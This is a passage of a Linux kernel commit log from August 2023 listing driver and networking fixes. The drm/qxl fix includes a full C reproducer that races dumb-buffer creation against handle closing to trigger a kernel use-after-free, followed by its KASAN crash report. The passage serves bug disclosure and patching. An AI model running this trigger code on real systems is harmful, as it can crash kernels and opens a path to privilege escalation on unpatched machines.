        drm/i915: fix display probe for IVB Q and IVB D GT2 server
        drm/i915/sdvo: fix panel_type initialization
        drm/i915/guc/slpc: Restore efficient freq earlier
        drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
        drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
      1ada9c07
  4. 17 Aug, 2023 9 commits
    • Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      820a38d8
    • drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and close it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      int dri_fd =-1;
      struct drm_mode_create_dumb arg = {0};
      
      void gem_close(int handle);
      
      void* trigger(void* ptr)
      {
      	int ret;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      void gem_close(int handle)
      {
      	struct drm_gem_close args;
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is decremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/
      Signed-off-by: Wander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: Dave Airlie <airlied@redhat.com>
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
      c611589b
    • Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
      68c60b34
    • Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes · be48306f
      Dave Airlie authored
      One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
      the AUO G121EAN01 panel, integer overflow and memory leak fixes for
      the qaic accel, a use-after-free fix for nouveau and a revert for an
      alleged fix in EDID parsing.
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      
      From: Maxime Ripard <mripard@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq
      be48306f
    • Merge tag 'drm-intel-fixes-2023-08-17' of... · dd64d8ae
      Dave Airlie authored
      Merge tag 'drm-intel-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-intel into drm-fixes
      
      - Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
      - Fix SDVO panel_type initialization (Jani)
      - Fix display probe for IVB Q and IVB D GT2 server (Jani)
      Signed-off-by: Dave Airlie <airlied@redhat.com>
      
      From: Rodrigo Vivi <rodrigo.vivi@intel.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/ZN4yduyBU1Ev9dc7@intel.com
      dd64d8ae
    • Merge tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux · e9bbd601
      Jakub Kicinski authored
      Saeed Mahameed says:
      
      ====================
      mlx5 fixes 2023-08-16
      
      This series provides bug fixes to mlx5 driver.
      
      * tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux:
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
      ====================
      
      Link: https://lore.kernel.org/r/20230816204108.53819-1-saeed@kernel.org
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      e9bbd601
    • ice: Block switchdev mode when ADQ is active and vice versa · 43d00e10
      Marcin Szycik authored
      ADQ and switchdev are not supported simultaneously. Enabling both at the
      same time can result in nullptr dereference.
      
      To prevent this, check if ADQ is active when changing devlink mode to
      switchdev mode, and check if switchdev is active when enabling ADQ.
      
      Fixes: fbc7b27a ("ice: enable ndo_setup_tc support for mqprio_qdisc")
      Signed-off-by: Marcin Szycik <marcin.szycik@linux.intel.com>
      Reviewed-by: Przemek Kitszel <przemyslaw.kitszel@intel.com>
      Tested-by: Sujai Buvaneswaran <sujai.buvaneswaran@intel.com>
      Signed-off-by: Tony Nguyen <anthony.l.nguyen@intel.com>
      Reviewed-by: Simon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816193405.1307580-1-anthony.l.nguyen@intel.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      43d00e10
    • qede: fix firmware halt over suspend and resume · 2eb9625a
      Manish Chopra authored
      While performing certain power-off sequences, PCI drivers are
      called to suspend and resume their underlying devices through
      PCI PM (power management) interface. However this NIC hardware
      does not support PCI PM suspend/resume operations so system wide
      suspend/resume leads to bad MFW (management firmware) state which
      causes various follow-up errors in driver when communicating with
      the device/firmware afterwards.
      
      To fix this, the driver implements a PCI PM suspend handler to indicate
      the unsupported operation to the PCI subsystem explicitly, thus preventing
      the system from going into suspended/standby mode.
      
      Without this fix device/firmware does not recover unless system
      is power cycled.
      
      Fixes: 2950219d ("qede: Add basic network device support")
      Signed-off-by: Manish Chopra <manishc@marvell.com>
      Signed-off-by: Alok Prasad <palok@marvell.com>
      Reviewed-by: John Meneghini <jmeneghi@redhat.com>
      Reviewed-by: Simon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816150711.59035-1-manishc@marvell.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      2eb9625a
    • net: do not allow gso_size to be set to GSO_BY_FRAGS · b616be6b
      Eric Dumazet authored
      One missing check in virtio_net_hdr_to_skb() allowed
      syzbot to crash kernels again [1]
      
      Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff),
      because this magic value is used by the kernel.
      
      [1]
      general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
      KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
      CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0
      Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
      RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500
      Call Trace:
      <TASK>
      udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109
      ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120
      skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53
      __skb_gso_segment+0x339/0x710 net/core/gso.c:124
      skb_gso_segment include/net/gso.h:83 [inline]
      validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625
      __dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329
      dev_queue_xmit include/linux/netdevice.h:3082 [inline]
      packet_xmit+0x257/0x380 net/packet/af_packet.c:276
      packet_snd net/packet/af_packet.c:3087 [inline]
      packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119
      sock_sendmsg_nosec net/socket.c:727 [inline]
      sock_sendmsg+0xd9/0x180 net/socket.c:750
      ____sys_sendmsg+0x6ac/0x940 net/socket.c:2496
      ___sys_sendmsg+0x135/0x1d0 net/socket.c:2550
      __sys_sendmsg+0x117/0x1e0 net/socket.c:2579
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      RIP: 0033:0x7ff27cdb34d9
      
      Fixes: 3953c46c ("sk_buff: allow segmenting based on frag sizes")
      Reported-by: syzbot <syzkaller@googlegroups.com>
      Signed-off-by: Eric Dumazet <edumazet@google.com>
      Cc: Xin Long <lucien.xin@gmail.com>
      Cc: "Michael S. Tsirkin" <mst@redhat.com>
      Cc: Jason Wang <jasowang@redhat.com>
      Reviewed-by: Willem de Bruijn <willemb@google.com>
      Reviewed-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: Xuan Zhuo <xuanzhuo@linux.alibaba.com>
      Link: https://lore.kernel.org/r/20230816142158.1779798-1-edumazet@google.com
      Signed-off-by: Jakub Kicinski <kuba@kernel.org>
      b616be6b
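
An added example, not code from the qxl driver or from any commit listed here: a single-threaded C model of the lifetime bug described in the drm/qxl commit c611589b in this group, where the creator's pointer is kept alive only by the handle's reference, next to the shape of the fix, where the caller holds its own reference until it is done. All names (struct obj, create_with_handle, dumb_create, handle_close, live_objects) are hypothetical, and the racing close is modelled as a call made inside the window rather than a second thread.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Userspace model of the handle/refcount lifetime. Every name here is
 * hypothetical; none of this is the qxl driver's code. */
#define MAX_HANDLES 8

struct obj {
    int refcount;  /* number of owners */
    bool alive;    /* cleared when the last reference is dropped */
    int pitch;     /* field the creator writes after creation */
};

static struct obj pool[MAX_HANDLES];     /* stands in for the slab cache */
static struct obj *handles[MAX_HANDLES]; /* handle -> object table */

static void obj_put(struct obj *o)
{
    if (--o->refcount == 0)
        o->alive = false; /* models kfree(); storage stays inspectable */
}

/* Models the GEM close ioctl, callable by any thread of the process. */
static int handle_close(int h)
{
    if (h < 0 || h >= MAX_HANDLES || !handles[h])
        return -1;
    obj_put(handles[h]);
    handles[h] = NULL;
    return 0;
}

/* Creates an object plus a handle. With keep_ref the creator's reference is
 * handed to the caller (post-fix shape); without it the reference is dropped
 * and *out is a weak pointer kept alive only by the handle (pre-fix shape). */
static int create_with_handle(bool keep_ref, struct obj **out)
{
    for (int h = 0; h < MAX_HANDLES; h++) {
        struct obj *o = &pool[h];
        if (handles[h] || o->alive)
            continue;
        memset(o, 0, sizeof(*o));
        o->alive = true;
        o->refcount = 2;   /* one for the creator, one for the handle */
        handles[h] = o;
        if (!keep_ref)
            obj_put(o);    /* only the handle owns it now */
        *out = o;
        return h;
    }
    return -1;
}

/* Returns true if the post-creation write landed on a live object.
 * racing_close models the other thread closing the handle in the window. */
static bool dumb_create(bool fixed, bool racing_close)
{
    struct obj *o;
    int h = create_with_handle(fixed, &o);
    if (h < 0)
        return false;
    if (racing_close)
        handle_close(h);
    bool ok = o->alive;    /* a real driver would dereference blindly */
    if (ok)
        o->pitch = 128;
    if (fixed)
        obj_put(o);        /* caller drops its own reference when done */
    return ok;
}

/* Counts objects that still have at least one owner (leak check). */
static int live_objects(void)
{
    int n = 0;
    for (int h = 0; h < MAX_HANDLES; h++)
        n += pool[h].alive;
    return n;
}

int main(void)
{
    bool a = dumb_create(false, false), b = dumb_create(false, true);
    bool c = dumb_create(true, true);
    printf("pre-fix quiet=%d pre-fix raced=%d post-fix raced=%d live=%d\n",
           a, b, c, live_objects());
    return 0;
}
```

In the post-fix path the racing close only drops the handle's reference, so the object is released by the caller's own put and nothing leaks.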